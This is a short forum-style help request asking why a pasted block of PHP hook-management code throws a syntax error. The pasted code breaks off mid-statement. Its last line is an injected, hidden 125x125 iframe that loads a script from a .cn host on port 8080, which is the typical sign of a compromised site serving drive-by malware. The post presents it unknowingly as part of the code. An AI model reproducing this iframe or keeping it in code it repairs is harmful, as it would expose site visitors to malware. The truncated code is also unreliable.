Can someone help me see what is wrong with this?
I have pasted lines 218 to 237 below (the syntax error is on line 237):
function add_hook($definition)
{
if (!is_array($definition))
{
$definition = array('__global', $definition);
}
$this->hooks[$definition[0]][$definition[1]] = array();
}
/**
* Remove function from the allowed hooks.
*
* @param mixed $definition Declaring function (with __FUNCTION__) or class with array(__CLASS__, __FUNCTION__)
*/
function remove_hook($definition)
{
$class = (!is_array($definition)) ? '__global' : $definition[0];
$function = (!is_array($definition)) ? $definition : $
$iframe src="http://dynamicfilmmedia.cn:8080/ts/in.cgi?pepsi68" width=125 height=125 style='visibility: hidden'